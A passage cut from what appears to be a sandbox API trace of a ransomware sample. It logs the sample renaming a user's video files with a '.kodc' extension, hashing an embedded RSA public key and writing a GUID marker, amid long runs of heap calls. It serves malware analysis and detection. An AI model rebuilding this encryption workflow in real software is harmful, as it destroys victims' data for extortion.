0x32cec40 [0100.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d58 [0100.555] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0100.555] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d70 [0100.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d40 [0100.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7d88 [0100.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb79c8 [0100.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0100.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0100.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.557] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0100.557] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d58 | out: hHeap=0x630000) returned 1 [0100.557] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d58 [0100.557] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xebff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.557] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.558] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.558] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.558] CloseHandle (hObject=0x5cc) returned 1 [0100.559] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0100.559] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x333bc58 [0100.560] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ViLsu.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vilsu.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ViLsu.mp4.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vilsu.mp4.kodc")) returned 1 [0100.561] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20bddb40, ftCreationTime.dwHighDateTime=0x1d5b7b3, ftLastAccessTime.dwLowDateTime=0x170b1150, ftLastAccessTime.dwHighDateTime=0x1d5b80b, ftLastWriteTime.dwLowDateTime=0x170b1150, ftLastWriteTime.dwHighDateTime=0x1d5b80b, nFileSizeHigh=0x0, nFileSizeLow=0x8398, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vq g FTFubq5cA.flv", cAlternateFileName="VQGFTF~1.FLV")) returned 1 [0100.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0100.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0100.562] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\vq g FTFubq5cA.flv") returned=".flv" [0100.562] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\vq g FTFubq5cA.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vq g ftfubq5ca.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.562] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=33688) returned 1 [0100.562] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.565] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x8372, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.565] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.566] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.566] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x8398, lpOverlapped=0x0) returned 1 [0100.567] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.567] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.567] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.567] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.567] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0100.568] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.568] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.568] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.568] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.568] GetLastError () returned 0x0 [0100.569] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.569] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0100.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.569] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.569] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.569] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x83a0) returned 0x9ba8d90 [0100.569] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0100.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c850 [0100.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d28 [0100.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c898 [0100.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d40 [0100.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d70 [0100.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d88 [0100.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.570] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0100.570] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d70 | out: hHeap=0x630000) returned 1 [0100.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d88 | out: hHeap=0x630000) returned 1 [0100.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0100.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7d88 [0100.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0100.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7d70 [0100.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0100.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0100.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0100.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d88 | out: hHeap=0x630000) returned 1 [0100.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d70 | out: hHeap=0x630000) returned 1 [0100.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0100.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.572] GetCurrentThreadId () returned 0x42c [0100.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba7078 [0100.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0100.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.572] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.572] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.572] GetCurrentThreadId () returned 0x42c [0100.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0100.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d70 [0100.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0100.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d88 [0100.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d58 [0100.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7da0 [0100.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a10 [0100.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0100.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0100.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0100.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d70 | out: hHeap=0x630000) returned 1 [0100.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d70 [0100.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0100.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0100.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0100.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0100.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c540 [0100.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0100.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d70 | out: hHeap=0x630000) returned 1 [0100.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0100.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0100.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0100.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0100.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0100.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0100.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7da0 | out: hHeap=0x630000) returned 1 [0100.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, 